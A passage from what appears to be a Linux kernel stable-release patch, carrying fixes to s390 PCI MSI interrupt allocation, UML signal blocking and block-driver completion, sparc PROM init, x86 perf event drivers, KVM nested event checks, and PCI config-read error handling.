+ 		 * pagevecs. With lru_add_drain() we drain the pagevecs
+ 		 * on the local CPU so that hopefully the refcount will
+diff --git a/arch/s390/pci/pci_irq.c b/arch/s390/pci/pci_irq.c
+index 04c19ab93a329..393bcc2c3dc2b 100644
+--- a/arch/s390/pci/pci_irq.c
++++ b/arch/s390/pci/pci_irq.c
+@@ -268,33 +268,20 @@ static void zpci_floating_irq_handler(struct airq_struct *airq,
+ 	}
+ }
+ 
+-int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
++static int __alloc_airq(struct zpci_dev *zdev, int msi_vecs,
++			unsigned long *bit)
+ {
+-	struct zpci_dev *zdev = to_zpci(pdev);
+-	unsigned int hwirq, msi_vecs, cpu;
+-	unsigned long bit;
+-	struct msi_desc *msi;
+-	struct msi_msg msg;
+-	int cpu_addr;
+-	int rc, irq;
+-
+-	zdev->aisb = -1UL;
+-	zdev->msi_first_bit = -1U;
+-	if (type == PCI_CAP_ID_MSI && nvec > 1)
+-		return 1;
+-	msi_vecs = min_t(unsigned int, nvec, zdev->max_msi);
+-
+ 	if (irq_delivery == DIRECTED) {
+ 		/* Allocate cpu vector bits */
+-		bit = airq_iv_alloc(zpci_ibv[0], msi_vecs);
+-		if (bit == -1UL)
++		*bit = airq_iv_alloc(zpci_ibv[0], msi_vecs);
++		if (*bit == -1UL)
+ 			return -EIO;
+ 	} else {
+ 		/* Allocate adapter summary indicator bit */
+-		bit = airq_iv_alloc_bit(zpci_sbv);
+-		if (bit == -1UL)
++		*bit = airq_iv_alloc_bit(zpci_sbv);
++		if (*bit == -1UL)
+ 			return -EIO;
+-		zdev->aisb = bit;
++		zdev->aisb = *bit;
+ 
+ 		/* Create adapter interrupt vector */
+ 		zdev->aibv = airq_iv_create(msi_vecs, AIRQ_IV_DATA | AIRQ_IV_BITLOCK, NULL);
+@@ -302,27 +289,66 @@ int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
+ 			return -ENOMEM;
+ 
+ 		/* Wire up shortcut pointer */
+-		zpci_ibv[bit] = zdev->aibv;
++		zpci_ibv[*bit] = zdev->aibv;
+ 		/* Each function has its own interrupt vector */
+-		bit = 0;
++		*bit = 0;
+ 	}
++	return 0;
++}
+ 
+-	/* Request MSI interrupts */
++int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
++{
++	unsigned int hwirq, msi_vecs, irqs_per_msi, i, cpu;
++	struct zpci_dev *zdev = to_zpci(pdev);
++	struct msi_desc *msi;
++	struct msi_msg msg;
++	unsigned long bit;
++	int cpu_addr;
++	int rc, irq;
++
++	zdev->aisb = -1UL;
++	zdev->msi_first_bit = -1U;
++
++	msi_vecs = min_t(unsigned int, nvec, zdev->max_msi);
++	if (msi_vecs < nvec) {
++		pr_info("%s requested %d irqs, allocate system limit of %d",
++			pci_name(pdev), nvec, zdev->max_msi);
++	}
++
++	rc = __alloc_airq(zdev, msi_vecs, &bit);
++	if (rc < 0)
++		return rc;
++
++	/*
++	 * Request MSI interrupts:
++	 * When using MSI, nvec_used interrupt sources and their irq
++	 * descriptors are controlled through one msi descriptor.
++	 * Thus the outer loop over msi descriptors shall run only once,
++	 * while two inner loops iterate over the interrupt vectors.
++	 * When using MSI-X, each interrupt vector/irq descriptor
++	 * is bound to exactly one msi descriptor (nvec_used is one).
++	 * So the inner loops are executed once, while the outer iterates
++	 * over the MSI-X descriptors.
++	 */
+ 	hwirq = bit;
+ 	msi_for_each_desc(msi, &pdev->dev, MSI_DESC_NOTASSOCIATED) {
+-		rc = -EIO;
+ 		if (hwirq - bit >= msi_vecs)
+ 			break;
+-		irq = __irq_alloc_descs(-1, 0, 1, 0, THIS_MODULE,
+-				(irq_delivery == DIRECTED) ?
+-				msi->affinity : NULL);
++		irqs_per_msi = min_t(unsigned int, msi_vecs, msi->nvec_used);
++		irq = __irq_alloc_descs(-1, 0, irqs_per_msi, 0, THIS_MODULE,
++					(irq_delivery == DIRECTED) ?
++					msi->affinity : NULL);
+ 		if (irq < 0)
+ 			return -ENOMEM;
+-		rc = irq_set_msi_desc(irq, msi);
+-		if (rc)
+-			return rc;
+-		irq_set_chip_and_handler(irq, &zpci_irq_chip,
+-					 handle_percpu_irq);
++
++		for (i = 0; i < irqs_per_msi; i++) {
++			rc = irq_set_msi_desc_off(irq, i, msi);
++			if (rc)
++				return rc;
++			irq_set_chip_and_handler(irq + i, &zpci_irq_chip,
++						 handle_percpu_irq);
++		}
++
+ 		msg.data = hwirq - bit;
+ 		if (irq_delivery == DIRECTED) {
+ 			if (msi->affinity)
+@@ -335,31 +361,35 @@ int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
+ 			msg.address_lo |= (cpu_addr << 8);
+ 
+ 			for_each_possible_cpu(cpu) {
+-				airq_iv_set_data(zpci_ibv[cpu], hwirq, irq);
++				for (i = 0; i < irqs_per_msi; i++)
++					airq_iv_set_data(zpci_ibv[cpu],
++							 hwirq + i, irq + i);
+ 			}
+ 		} else {
+ 			msg.address_lo = zdev->msi_addr & 0xffffffff;
+-			airq_iv_set_data(zdev->aibv, hwirq, irq);
++			for (i = 0; i < irqs_per_msi; i++)
++				airq_iv_set_data(zdev->aibv, hwirq + i, irq + i);
+ 		}
+ 		msg.address_hi = zdev->msi_addr >> 32;
+ 		pci_write_msi_msg(irq, &msg);
+-		hwirq++;
++		hwirq += irqs_per_msi;
+ 	}
+ 
+ 	zdev->msi_first_bit = bit;
+-	zdev->msi_nr_irqs = msi_vecs;
++	zdev->msi_nr_irqs = hwirq - bit;
+ 
+ 	rc = zpci_set_irq(zdev);
+ 	if (rc)
+ 		return rc;
+ 
+-	return (msi_vecs == nvec) ? 0 : msi_vecs;
++	return (zdev->msi_nr_irqs == nvec) ? 0 : zdev->msi_nr_irqs;
+ }
+ 
+ void arch_teardown_msi_irqs(struct pci_dev *pdev)
+ {
+ 	struct zpci_dev *zdev = to_zpci(pdev);
+ 	struct msi_desc *msi;
++	unsigned int i;
+ 	int rc;
+ 
+ 	/* Disable interrupts */
+@@ -369,8 +399,10 @@ void arch_teardown_msi_irqs(struct pci_dev *pdev)
+ 
+ 	/* Release MSI interrupts */
+ 	msi_for_each_desc(msi, &pdev->dev, MSI_DESC_ASSOCIATED) {
+-		irq_set_msi_desc(msi->irq, NULL);
+-		irq_free_desc(msi->irq);
++		for (i = 0; i < msi->nvec_used; i++) {
++			irq_set_msi_desc(msi->irq + i, NULL);
++			irq_free_desc(msi->irq + i);
++		}
+ 		msi->msg.address_lo = 0;
+ 		msi->msg.address_hi = 0;
+ 		msi->msg.data = 0;
+diff --git a/arch/sparc/include/asm/oplib_64.h b/arch/sparc/include/asm/oplib_64.h
+index a67abebd43592..1b86d02a84556 100644
+--- a/arch/sparc/include/asm/oplib_64.h
++++ b/arch/sparc/include/asm/oplib_64.h
+@@ -247,6 +247,7 @@ void prom_sun4v_guest_soft_state(void);
+ int prom_ihandle2path(int handle, char *buffer, int bufsize);
+ 
+ /* Client interface level routines. */
++void prom_cif_init(void *cif_handler);
+ void p1275_cmd_direct(unsigned long *);
+ 
+ #endif /* !(__SPARC64_OPLIB_H) */
+diff --git a/arch/sparc/prom/init_64.c b/arch/sparc/prom/init_64.c
+index 103aa91043185..f7b8a1a865b8f 100644
+--- a/arch/sparc/prom/init_64.c
++++ b/arch/sparc/prom/init_64.c
+@@ -26,9 +26,6 @@ phandle prom_chosen_node;
+  * routines in the prom library.
+  * It gets passed the pointer to the PROM vector.
+  */
+-
+-extern void prom_cif_init(void *);
+-
+ void __init prom_init(void *cif_handler)
+ {
+ 	phandle node;
+diff --git a/arch/sparc/prom/p1275.c b/arch/sparc/prom/p1275.c
+index 889aa602f8d86..51c3f984bbf72 100644
+--- a/arch/sparc/prom/p1275.c
++++ b/arch/sparc/prom/p1275.c
+@@ -49,7 +49,7 @@ void p1275_cmd_direct(unsigned long *args)
+ 	local_irq_restore(flags);
+ }
+ 
+-void prom_cif_init(void *cif_handler, void *cif_stack)
++void prom_cif_init(void *cif_handler)
+ {
+ 	p1275buf.prom_cif_handler = (void (*)(long *))cif_handler;
+ }
+diff --git a/arch/um/drivers/ubd_kern.c b/arch/um/drivers/ubd_kern.c
+index 13a22a4613051..1203f5078cb57 100644
+--- a/arch/um/drivers/ubd_kern.c
++++ b/arch/um/drivers/ubd_kern.c
+@@ -456,43 +456,31 @@ static int bulk_req_safe_read(
+ 	return n;
+ }
+ 
+-/* Called without dev->lock held, and only in interrupt context. */
+-static void ubd_handler(void)
++static void ubd_end_request(struct io_thread_req *io_req)
+ {
+-	int n;
+-	int count;
+-
+-	while(1){
+-		n = bulk_req_safe_read(
+-			thread_fd,
+-			irq_req_buffer,
+-			&irq_remainder,
+-			&irq_remainder_size,
+-			UBD_REQ_BUFFER_SIZE
+-		);
+-		if (n < 0) {
+-			if(n == -EAGAIN)
+-				break;
+-			printk(KERN_ERR "spurious interrupt in ubd_handler, "
+-			       "err = %d\n", -n);
+-			return;
+-		}
+-		for (count = 0; count < n/sizeof(struct io_thread_req *); count++) {
+-			struct io_thread_req *io_req = (*irq_req_buffer)[count];
+-
+-			if ((io_req->error == BLK_STS_NOTSUPP) && (req_op(io_req->req) == REQ_OP_DISCARD)) {
+-				blk_queue_max_discard_sectors(io_req->req->q, 0);
+-				blk_queue_max_write_zeroes_sectors(io_req->req->q, 0);
+-			}
+-			blk_mq_end_request(io_req->req, io_req->error);
+-			kfree(io_req);
+-		}
++	if (io_req->error == BLK_STS_NOTSUPP) {
++		if (req_op(io_req->req) == REQ_OP_DISCARD)
++			blk_queue_max_discard_sectors(io_req->req->q, 0);
++		else if (req_op(io_req->req) == REQ_OP_WRITE_ZEROES)
++			blk_queue_max_write_zeroes_sectors(io_req->req->q, 0);
+ 	}
++	blk_mq_end_request(io_req->req, io_req->error);
++	kfree(io_req);
+ }
+ 
+ static irqreturn_t ubd_intr(int irq, void *dev)
+ {
+-	ubd_handler();
++	int len, i;
++
++	while ((len = bulk_req_safe_read(thread_fd, irq_req_buffer,
++			&irq_remainder, &irq_remainder_size,
++			UBD_REQ_BUFFER_SIZE)) >= 0) {
++		for (i = 0; i < len / sizeof(struct io_thread_req *); i++)
++			ubd_end_request((*irq_req_buffer)[i]);
++	}
++
++	if (len < 0 && len != -EAGAIN)
++		pr_err("spurious interrupt in %s, err = %d\n", __func__, len);
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/um/kernel/time.c b/arch/um/kernel/time.c
+index 3e270da6b6f67..c8c4ef94c753f 100644
+--- a/arch/um/kernel/time.c
++++ b/arch/um/kernel/time.c
+@@ -874,9 +874,9 @@ int setup_time_travel_start(char *str)
+ 	return 1;
+ }
+ 
+-__setup("time-travel-start", setup_time_travel_start);
++__setup("time-travel-start=", setup_time_travel_start);
+ __uml_help(setup_time_travel_start,
+-"time-travel-start=<seconds>\n"
++"time-travel-start=<nanoseconds>\n"
+ "Configure the UML instance's wall clock to start at this value rather than\n"
+ "the host's wall clock at the time of UML boot.\n");
+ #endif
+diff --git a/arch/um/os-Linux/signal.c b/arch/um/os-Linux/signal.c
+index 24a403a70a020..850d21e6473ee 100644
+--- a/arch/um/os-Linux/signal.c
++++ b/arch/um/os-Linux/signal.c
+@@ -8,6 +8,7 @@
+ 
+ #include <stdlib.h>
+ #include <stdarg.h>
++#include <stdbool.h>
+ #include <errno.h>
+ #include <signal.h>
+ #include <string.h>
+@@ -65,9 +66,7 @@ static void sig_handler_common(int sig, struct siginfo *si, mcontext_t *mc)
+ 
+ int signals_enabled;
+ #ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
+-static int signals_blocked;
+-#else
+-#define signals_blocked 0
++static int signals_blocked, signals_blocked_pending;
+ #endif
+ static unsigned int signals_pending;
+ static unsigned int signals_active = 0;
+@@ -76,14 +75,27 @@ void sig_handler(int sig, struct siginfo *si, mcontext_t *mc)
+ {
+ 	int enabled = signals_enabled;
+ 
+-	if ((signals_blocked || !enabled) && (sig == SIGIO)) {
++#ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
++	if ((signals_blocked ||
++	     __atomic_load_n(&signals_blocked_pending, __ATOMIC_SEQ_CST)) &&
++	    (sig == SIGIO)) {
++		/* increment so unblock will do another round */
++		__atomic_add_fetch(&signals_blocked_pending, 1,
++				   __ATOMIC_SEQ_CST);
++		return;
++	}
++#endif
++
++	if (!enabled && (sig == SIGIO)) {
+ 		/*
+ 		 * In TT_MODE_EXTERNAL, need to still call time-travel
+-		 * handlers unless signals are also blocked for the
+-		 * external time message processing. This will mark
+-		 * signals_pending by itself (only if necessary.)
++		 * handlers. This will mark signals_pending by itself
++		 * (only if necessary.)
++		 * Note we won't get here if signals are hard-blocked
++		 * (which is handled above), in that case the hard-
++		 * unblock will handle things.
+ 		 */
+-		if (!signals_blocked && time_travel_mode == TT_MODE_EXTERNAL)
++		if (time_travel_mode == TT_MODE_EXTERNAL)
+ 			sigio_run_timetravel_handlers();
+ 		else
+ 			signals_pending |= SIGIO_MASK;
+@@ -380,33 +392,99 @@ int um_set_signals_trace(int enable)
+ #ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
+ void mark_sigio_pending(void)
+ {
++	/*
++	 * It would seem that this should be atomic so
++	 * it isn't a read-modify-write with a signal
++	 * that could happen in the middle, losing the
++	 * value set by the signal.
++	 *
++	 * However, this function is only called when in
++	 * time-travel=ext simulation mode, in which case
++	 * the only signal ever pending is SIGIO, which
++	 * is blocked while this can be called, and the
++	 * timer signal (SIGALRM) cannot happen.
++	 */
+ 	signals_pending |= SIGIO_MASK;
+ }
+ 
+ void block_signals_hard(void)
+ {
+-	if (signals_blocked)
+-		return;
+-	signals_blocked = 1;
++	signals_blocked++;
+ 	barrier();
+ }
+ 
+ void unblock_signals_hard(void)
+ {
++	static bool unblocking;
++
+ 	if (!signals_blocked)
++		panic("unblocking signals while not blocked");
++
++	if (--signals_blocked)
+ 		return;
+-	/* Must be set to 0 before we check the pending bits etc. */
+-	signals_blocked = 0;
++	/*
++	 * Must be set to 0 before we check pending so the
++	 * SIGIO handler will run as normal unless we're still
++	 * going to process signals_blocked_pending.
++	 */
+ 	barrier();
+ 
+-	if (signals_pending && signals_enabled) {
+-		/* this is a bit inefficient, but that's not really important */
+-		block_signals();
+-		unblock_signals();
+-	} else if (signals_pending & SIGIO_MASK) {
+-		/* we need to run time-travel handlers even if not enabled */
+-		sigio_run_timetravel_handlers();
++	/*
++	 * Note that block_signals_hard()/unblock_signals_hard() can be called
++	 * within the unblock_signals()/sigio_run_timetravel_handlers() below.
++	 * This would still be prone to race conditions since it's actually a
++	 * call _within_ e.g. vu_req_read_message(), where we observed this
++	 * issue, which loops. Thus, if the inner call handles the recorded
++	 * pending signals, we can get out of the inner call with the real
++	 * signal hander no longer blocked, and still have a race. Thus don't
++	 * handle unblocking in the inner call, if it happens, but only in
++	 * the outermost call - 'unblocking' serves as an ownership for the
++	 * signals_blocked_pending decrement.
++	 */
++	if (unblocking)
++		return;
++	unblocking = true;
++
++	while (__atomic_load_n(&signals_blocked_pending, __ATOMIC_SEQ_CST)) {
++		if (signals_enabled) {
++			/* signals are enabled so we can touch this */
++			signals_pending |= SIGIO_MASK;
++			/*
++			 * this is a bit inefficient, but that's
++			 * not really important
++			 */
++			block_signals();
++			unblock_signals();
++		} else {
++			/*
++			 * we need to run time-travel handlers even
++			 * if not enabled
++			 */
++			sigio_run_timetravel_handlers();
++		}
++
++		/*
++		 * The decrement of signals_blocked_pending must be atomic so
++		 * that the signal handler will either happen before or after
++		 * the decrement, not during a read-modify-write:
++		 *  - If it happens before, it can increment it and we'll
++		 *    decrement it and do another round in the loop.
++		 *  - If it happens after it'll see 0 for both signals_blocked
++		 *    and signals_blocked_pending and thus run the handler as
++		 *    usual (subject to signals_enabled, but that's unrelated.)
++		 *
++		 * Note that a call to unblock_signals_hard() within the calls
++		 * to unblock_signals() or sigio_run_timetravel_handlers() above
++		 * will do nothing due to the 'unblocking' state, so this cannot
++		 * underflow as the only one decrementing will be the outermost
++		 * one.
++		 */
++		if (__atomic_sub_fetch(&signals_blocked_pending, 1,
++				       __ATOMIC_SEQ_CST) < 0)
++			panic("signals_blocked_pending underflow");
+ 	}
++
++	unblocking = false;
+ }
+ #endif
+ 
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index 1394312b732a3..2b2c9fd74ef90 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -2573,6 +2573,7 @@ static ssize_t set_attr_rdpmc(struct device *cdev,
+ 			      struct device_attribute *attr,
+ 			      const char *buf, size_t count)
+ {
++	static DEFINE_MUTEX(rdpmc_mutex);
+ 	unsigned long val;
+ 	ssize_t ret;
+ 
+@@ -2586,6 +2587,8 @@ static ssize_t set_attr_rdpmc(struct device *cdev,
+ 	if (x86_pmu.attr_rdpmc_broken)
+ 		return -ENOTSUPP;
+ 
++	guard(mutex)(&rdpmc_mutex);
++
+ 	if (val != x86_pmu.attr_rdpmc) {
+ 		/*
+ 		 * Changing into or out of never available or always available,
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index 551741e79e038..8175bff77efa7 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -80,7 +80,7 @@
+  *	MSR_PKG_C7_RESIDENCY:  Package C7 Residency Counter.
+  *			       perf code: 0x03
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,CNL,
+- *						KBL,CML,ICL,TGL,RKL,ADL,RPL,MTL
++ *						KBL,CML,ICL,TGL,RKL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C8_RESIDENCY:  Package C8 Residency Counter.
+  *			       perf code: 0x04
+@@ -89,8 +89,7 @@
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C9_RESIDENCY:  Package C9 Residency Counter.
+  *			       perf code: 0x05
+- *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL,MTL
++ *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C10_RESIDENCY: Package C10 Residency Counter.
+  *			       perf code: 0x06
+@@ -584,9 +583,7 @@ static const struct cstate_model adl_cstates __initconst = {
+ 	.pkg_events		= BIT(PERF_CSTATE_PKG_C2_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C3_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C6_RES) |
+-				  BIT(PERF_CSTATE_PKG_C7_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C8_RES) |
+-				  BIT(PERF_CSTATE_PKG_C9_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C10_RES),
+ };
+ 
+diff --git a/arch/x86/events/intel/pt.c b/arch/x86/events/intel/pt.c
+index 42a55794004a7..cc5c6a3264967 100644
+--- a/arch/x86/events/intel/pt.c
++++ b/arch/x86/events/intel/pt.c
+@@ -877,7 +877,7 @@ static void pt_update_head(struct pt *pt)
+  */
+ static void *pt_buffer_region(struct pt_buffer *buf)
+ {
+-	return phys_to_virt(TOPA_ENTRY(buf->cur, buf->cur_idx)->base << TOPA_SHIFT);
++	return phys_to_virt((phys_addr_t)TOPA_ENTRY(buf->cur, buf->cur_idx)->base << TOPA_SHIFT);
+ }
+ 
+ /**
+@@ -989,7 +989,7 @@ pt_topa_entry_for_page(struct pt_buffer *buf, unsigned int pg)
+ 	 * order allocations, there shouldn't be many of these.
+ 	 */
+ 	list_for_each_entry(topa, &buf->tables, list) {
+-		if (topa->offset + topa->size > pg << PAGE_SHIFT)
++		if (topa->offset + topa->size > (unsigned long)pg << PAGE_SHIFT)
+ 			goto found;
+ 	}
+ 
+diff --git a/arch/x86/events/intel/pt.h b/arch/x86/events/intel/pt.h
+index 96906a62aacda..f5e46c04c145d 100644
+--- a/arch/x86/events/intel/pt.h
++++ b/arch/x86/events/intel/pt.h
+@@ -33,8 +33,8 @@ struct topa_entry {
+ 	u64	rsvd2	: 1;
+ 	u64	size	: 4;
+ 	u64	rsvd3	: 2;
+-	u64	base	: 36;
+-	u64	rsvd4	: 16;
++	u64	base	: 40;
++	u64	rsvd4	: 12;
+ };
+ 
+ /* TSC to Core Crystal Clock Ratio */
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 9b5859812f4fb..d081eb89ba123 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -459,6 +459,7 @@
+ #define SPR_RAW_EVENT_MASK_EXT			0xffffff
+ 
+ /* SPR CHA */
++#define SPR_CHA_EVENT_MASK_EXT			0xffffffff
+ #define SPR_CHA_PMON_CTL_TID_EN			(1 << 16)
+ #define SPR_CHA_PMON_EVENT_MASK			(SNBEP_PMON_RAW_EVENT_MASK | \
+ 						 SPR_CHA_PMON_CTL_TID_EN)
+@@ -475,6 +476,7 @@ DEFINE_UNCORE_FORMAT_ATTR(umask_ext, umask, "config:8-15,32-43,45-55");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext2, umask, "config:8-15,32-57");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext3, umask, "config:8-15,32-39");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext4, umask, "config:8-15,32-55");
++DEFINE_UNCORE_FORMAT_ATTR(umask_ext5, umask, "config:8-15,32-63");
+ DEFINE_UNCORE_FORMAT_ATTR(qor, qor, "config:16");
+ DEFINE_UNCORE_FORMAT_ATTR(edge, edge, "config:18");
+ DEFINE_UNCORE_FORMAT_ATTR(tid_en, tid_en, "config:19");
+@@ -5648,7 +5650,7 @@ static struct intel_uncore_ops spr_uncore_chabox_ops = {
+ 
+ static struct attribute *spr_uncore_cha_formats_attr[] = {
+ 	&format_attr_event.attr,
+-	&format_attr_umask_ext4.attr,
++	&format_attr_umask_ext5.attr,
+ 	&format_attr_tid_en2.attr,
+ 	&format_attr_edge.attr,
+ 	&format_attr_inv.attr,
+@@ -5684,7 +5686,7 @@ ATTRIBUTE_GROUPS(uncore_alias);
+ static struct intel_uncore_type spr_uncore_chabox = {
+ 	.name			= "cha",
+ 	.event_mask		= SPR_CHA_PMON_EVENT_MASK,
+-	.event_mask_ext		= SPR_RAW_EVENT_MASK_EXT,
++	.event_mask_ext		= SPR_CHA_EVENT_MASK_EXT,
+ 	.num_shared_regs	= 1,
+ 	.constraints		= skx_uncore_chabox_constraints,
+ 	.ops			= &spr_uncore_chabox_ops,
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 887a171488ea2..9de3db4a32f80 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1651,7 +1651,7 @@ struct kvm_x86_nested_ops {
+ 	bool (*is_exception_vmexit)(struct kvm_vcpu *vcpu, u8 vector,
+ 				    u32 error_code);
+ 	int (*check_events)(struct kvm_vcpu *vcpu);
+-	bool (*has_events)(struct kvm_vcpu *vcpu);
++	bool (*has_events)(struct kvm_vcpu *vcpu, bool for_injection);
+ 	void (*triple_fault)(struct kvm_vcpu *vcpu);
+ 	int (*get_state)(struct kvm_vcpu *vcpu,
+ 			 struct kvm_nested_state __user *user_kvm_nested_state,
+diff --git a/arch/x86/kernel/devicetree.c b/arch/x86/kernel/devicetree.c
+index 5cd51f25f4461..c77297fa2dad5 100644
+--- a/arch/x86/kernel/devicetree.c
++++ b/arch/x86/kernel/devicetree.c
+@@ -87,7 +87,7 @@ static int x86_of_pci_irq_enable(struct pci_dev *dev)
+ 
+ 	ret = pci_read_config_byte(dev, PCI_INTERRUPT_PIN, &pin);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 	if (!pin)
+ 		return 0;
+ 
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 9d683b6067c7b..2283f485a81fb 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3934,7 +3934,7 @@ static bool nested_vmx_preemption_timer_pending(struct kvm_vcpu *vcpu)
+ 	       to_vmx(vcpu)->nested.preemption_timer_expired;
+ }
+ 
+-static bool vmx_has_nested_events(struct kvm_vcpu *vcpu)
++static bool vmx_has_nested_events(struct kvm_vcpu *vcpu, bool for_injection)
+ {
+ 	return nested_vmx_preemption_timer_pending(vcpu) ||
+ 	       to_vmx(vcpu)->nested.mtf_pending;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 10aff2c9a4e4c..87abf4eebf8a7 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -4980,14 +4980,19 @@ static int vmx_nmi_allowed(struct kvm_vcpu *vcpu, bool for_injection)
+ 	return !vmx_nmi_blocked(vcpu);
+ }
+ 
++bool __vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
++{
++	return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
++	       (vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
++		(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
++}
++
+ bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
+ {
+ 	if (is_guest_mode(vcpu) && nested_exit_on_intr(vcpu))
+ 		return false;
+ 
+-	return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
+-	       (vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
+-		(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
++	return __vmx_interrupt_blocked(vcpu);
+ }
+ 
+ static int vmx_interrupt_allowed(struct kvm_vcpu *vcpu, bool for_injection)
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index e2b04f4c0fef3..9e0bb98b116d1 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -413,6 +413,7 @@ u64 construct_eptp(struct kvm_vcpu *vcpu, hpa_t root_hpa, int root_level);
+ bool vmx_guest_inject_ac(struct kvm_vcpu *vcpu);
+ void vmx_update_exception_bitmap(struct kvm_vcpu *vcpu);
+ bool vmx_nmi_blocked(struct kvm_vcpu *vcpu);
++bool __vmx_interrupt_blocked(struct kvm_vcpu *vcpu);
+ bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu);
+ bool vmx_get_nmi_mask(struct kvm_vcpu *vcpu);
+ void vmx_set_nmi_mask(struct kvm_vcpu *vcpu, bool masked);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 53d83b37db8c8..658a88483d8b6 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10131,7 +10131,7 @@ static int kvm_check_and_inject_events(struct kvm_vcpu *vcpu,
+ 
+ 	if (is_guest_mode(vcpu) &&
+ 	    kvm_x86_ops.nested_ops->has_events &&
+-	    kvm_x86_ops.nested_ops->has_events(vcpu))
++	    kvm_x86_ops.nested_ops->has_events(vcpu, true))
+ 		*req_immediate_exit = true;
+ 
+ 	/*
+@@ -13013,7 +13013,7 @@ static inline bool kvm_vcpu_has_events(struct kvm_vcpu *vcpu)
+ 
+ 	if (is_guest_mode(vcpu) &&
+ 	    kvm_x86_ops.nested_ops->has_events &&
+-	    kvm_x86_ops.nested_ops->has_events(vcpu))
++	    kvm_x86_ops.nested_ops->has_events(vcpu, false))
+ 		return true;
+ 
+ 	if (kvm_xen_has_pending_events(vcpu))
+diff --git a/arch/x86/pci/intel_mid_pci.c b/arch/x86/pci/intel_mid_pci.c
+index 8edd622066044..722a33be08a18 100644
+--- a/arch/x86/pci/intel_mid_pci.c
++++ b/arch/x86/pci/intel_mid_pci.c
+@@ -233,9 +233,9 @@ static int intel_mid_pci_irq_enable(struct pci_dev *dev)
+ 		return 0;
+ 
+ 	ret = pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &gsi);
+-	if (ret < 0) {
++	if (ret) {
+ 		dev_warn(&dev->dev, "Failed to read interrupt line: %d\n", ret);
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 	}
+ 
+ 	id = x86_match_cpu(intel_mid_cpu_ids);
+diff --git a/arch/x86/pci/xen.c b/arch/x86/pci/xen.c
+index 5a4ecf0c2ac4d..b4621cc95e1fd 100644
+--- a/arch/x86/pci/xen.c
++++ b/arch/x86/pci/xen.c
+@@ -38,10 +38,10 @@ static int xen_pcifront_enable_irq(struct pci_dev *dev)
+ 	u8 gsi;
+ 
+ 	rc = pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &gsi);
+-	if (rc < 0) {
++	if (rc) {
+ 		dev_warn(&dev->dev, "Xen PCI: failed to read interrupt line: %d\n",
+ 			 rc);
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 	}
+ 	/* In PV DomU the Xen PCI backend puts the PIRQ in the interrupt line.*/
+ 	pirq = gsi;
+diff --git a/arch/x86/platform/intel/iosf_mbi.c b/arch/x86/platform/intel/iosf_mbi.c
+index fdd49d70b4373..c81cea208c2c4 100644
+--- a/arch/x86/platform/intel/iosf_mbi.c
++++ b/arch/x86/platform/intel/iosf_mbi.c
+@@ -62,7 +62,7 @@ static int iosf_mbi_pci_read_mdr(u32 mcrx, u32 mcr, u32 *mdr)
+ 
+ fail_read:
+ 	dev_err(&mbi_pdev->dev, "PCI config access failed with %d\n", result);
+-	return result;
++	return pcibios_err_to_errno(result);
+ }
+ 
+ static int iosf_mbi_pci_write_mdr(u32 mcrx, u32 mcr, u32 mdr)
